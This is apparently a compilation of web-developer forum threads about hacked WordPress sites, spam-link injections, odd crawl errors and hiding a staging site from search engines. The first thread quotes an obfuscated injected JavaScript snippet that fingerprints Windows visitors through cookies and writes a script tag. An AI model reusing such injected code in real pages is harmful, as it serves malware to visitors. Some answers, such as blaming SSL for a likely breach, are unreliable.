I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
That URL at the the end is super suspicious. I googled but found no leads :-(
I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.
Does anyone have any knowledge of this?
That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.
Related
I got an email this morning from google search console about 'Social Engineering Content Detected on Your Site' and they link the sent is something like this http://****.co[.]uk/~bettingb/
The website is WordPress website and I searched for the link in my files and database and I only found it in wordfence table wp_wfHits.
Is it possible that google crawled that link from this table?
is this something serious?
Any advice?
Before you act upon cjmling's advice, wp_wfHits is a legitimate table created by Wordfence (a security plugin).
As shown here
The fact that it is in this table means that Wordfence has noticed it, which is exactly what you want. I cannot imagine that this is the only place in the database that has this but it may be encoded elsewhere.
The other thing is that Wordfence may have already cleaned up the issue between Google spotting it and you looking into it. I would let Search Console run again and see if it is found again.
DO NOT think that your site has been fully compromised, change any admin passwords but you'll probably find that it was stuff added as a comment to a post (usual WordPress "hack")
Also, if you really want to be secure, change the database prefix (Wordfence I think has this option out the box) which means you are then not using the standard "wp_" prefix and you can spot things easier!
I'm using Wordpress 4.9.1–en_GB, and have a live site which has been up and live for some months without issue.
48 hours ago it suddenly (or rather I noticed suddenly) started displaying some pages as unformatted (no css) lists of links and text. The links on those pages were to another domain which directed to my site, but which has never been part of my site, and for which there is no direction within the site.
Loading and saving that one page fixed it on that page, and another page which was exhibiting the issue.
I redirected the external domain so that it would not point to my website.
Today it has exhibited the same behaviour, but with a subdomain which points to my site, but which again is not in use. Again saving the page without making any edits 'fixed' the behaviour.
I'm not asking for a fix - but whether anyone has ever experienced a similar problem, or has a pointer towards where to look, and will report back what I find, in the hope it helps someone else if it ever occurs to them.
I didn't originally build the site - it has a load of plugins, not all active and disabling and removing plugins is definitely an option - but not a great one, since the problem is not predictable, so I have no firm way of knowing whether my actions have fixed the issue, and in the meantime my commercial site will not be functioning as desired (which I appreciate is occasionally the case anyway it would seem).
It sits in Amazon EC2.
sorry for the lack of precision, but I am truly stumped.
this sounds like your website may have been breached. to address the conflict of web pages not formatting is usually the ssl not being installed correctly on the server. but if you have a lot of plugins installed it's a huge security issue and the plugins may be causing the domain issue
the plugins may be causing a conflict within each other I would recommend removing the plugins that generally don't get used.
deactivate the plugins in use and reactivate them.
use word fence security plugin to run to a scan on your website.
when I had this problem it was because the ssl was not installed on my server correctly if not that, a breach may be the cause. I hope this helps.
If the issue started within that time frame as stated that makes me more confident that this is an ssl issue. Sometimes an ssl doesn’t install correctly on a server this can cause a conflict with how the layout in css and HTML is affected. this is common in some cases, while it’s happening with the current theme your using, some WordPress themes can bypass the ssl error, I would recommend getting a new ssl from let’s encrypt and removing the one that was auto renewed through let’s encrypt. This could simply fix the problem. If not feel free to share your findings on the issue.
I recently built and published my Wordpress site at www.kernelops.com and submitted it to the google index and webmaster tools. Today I logged into webmaster tools and found 60 URL errors all with the same type of issue. The base domain address www.kernelops.com is being appended to all my sites page, category, and post URLs. An example of the failed URL looks like this:
http://www.kernelops.com/blog/www.kernelops.com
Google Webmaster Tools indicates that this weird link is originating from the base url "http://www.kernelops.com/blog" which obviously means the issue is on my end. My Wordpress permalink settings are set to use the post-name; I'm not sure if that could be causing this, i.e.:
http://www.kernelops.com/sample-post/
I can't seem to find any help resolving this weird issue with google searches and thought someone here may be able to point me in the right direction.
The Wordpress plugins that would potentially affect the site's URLs are the following:
All in One SEO
XML-Sitemap
But I can't see any sort of setting within these plugins that would be causing this type of issue.
Any ideas would be greatly appreciated - thanks in advance!
This is a long shot, but it may be happening if the Google crawler picks up a link that seems like a relative path and attempts to append it to the current directory. It's highly unlikely that Google would have such a bug, but it's not impossible either.
The closes thing I could find that may be considered a relative path is this:
<div class="copyright">
...
Kernel, Inc.
...
</div>
I doubt that this is the problem, but it may be worth fixing it.
Now, there is yet another possibility and that's if the website serves slightly different content depending on the User Agent string. When Google presents your website with a User Agent string, the SEO plugins detects it and tries to optimize things in order to improve your ranking (not familiar with that plugins, so I don't know what it does exactly). There may be a bug in the SEO plugin that will cause the www.kernelops.com URL to look like a relative path or to actually construct that faulty URL somehow.
You can possibly test this by setting the user-agent string in your browser (e.g. FireFox's user-agent switcher) to Googlebot's user-agent string and test what happens when you visit your website. Look at the page source that you receive and look for any links that might look like the one Google is finding.
However, if the SEO tool is smart enough, it will "realize" that your IP doesn't match one of the valid IPs for Googlebot and it will not make the modifications.
Last Wednesday a variety of the WordPress sites I manage got hacked, they were infected with a Viagra link (malware is so original).
I noticed in the wp-includes directory a file called utils.php (wp-includes/js/tinymce/utils/utils.php), also an addition to my general-template.php for the get_footer function.
This hack seems to only affect Google search results for sites, not the site when directly viewed by entering the URL, i.e your cached site will show a malware infested mess and lose ranking, meanwhile you will wonder why due to the site looking fine when viewed.
My host (TSO Host) have cleaned up the sites, didn't even need to ask, but I have no idea how the infection got there in the first place.
So my question is, does anyone know how the breach happens and what I can do to prevent it, other than the usual security tips?
This happened to a site that I spent weeks cleaning up. I can give you a few pointers:
Go through the Wordpress core files (under wp-admin and wp-includes) and delete all files that you don't see in the default wordpress instillation. I've never seen a plugin create a file in one of those 2 directories. After this, it'd be a good idea to re-install Wordpress, just in case they changed any of the existing files.
After that, change your Wordpress/FTP/SSH passwords as they've likly been cracked. Install WP Better Security. It seems a little annoying at first, but you can monitor everything with it, change the login slug, remove version info hackers can use to find security holes, black-list known hackers, and so much more.
Finally, this last one will take some time. Google your theme and each one of your plugins, and see if Wordpress has stopped using them because they were a security vulnerability. You'd be surprised at how many plugins haves holes. Try to avoid really new plugins, and try to use the same plugin for as many different sites as you can. If you're hosting more than one site on the same server and one of the sites gets hacked, they're all hacked.
It sounds like a pain, and it is a little bit, but after you're done you'll feel so much better knowing that you're in control of everything. Trust me.
Whats the best recommended way yo hide my staging website from search engines, i Googled it and found some says that i should put a metatag, and some said that i should put a text file inside my website directory, i want to know the standard way.
my current website is in asp.net, while i believe that it must be a common way for any website whatever its programming language.
Use a robots.txt file.
see here http://www.robotstxt.org/robotstxt.html
You could also use your servers robots.txt:
User-agent: *
Disallow: /
Google's crawler actually respects these settings.
Really easy answer; password protect it. If it’s a staging site then it quite likely is not intended to be publicly facing (private audience only most likely). Trying to keep it out of search engines is only treating a symptom when the real problem is that you haven’t appropriately secured it.
Keep in mind that you can't hide a public-facing unprotected web site from a search engine. You can ask that bots not index it (through the robots.txt that my fine colleagues have brought up), and the people who write the bots may choose not to index your site based on that, but there's got to be at least one guy out there who is indexing all the things people ask him not to index. At the very least one.
If this is a big requirement, keeping automated crawlers out, some kind of CAPCHA solution might work for you.
http://www.robotstxt.org/robotstxt.html
There are search engines / book marking services which do not use robots.txt. If you really don't want it to turn up ever I'd suggest using capcha's just to navigate to the site.
Whats the best recommended way yo hide my staging website from search engines
Simple: don't make it public. If that doesn't work, then only make it public long enough to validate that it is ready to post live and then take it down.
However, all that said, a more fundamental question is, "Why care?". If the staging site is really supposed to be the live site one step before pushing live, then it shouldn't matter if it is indexed.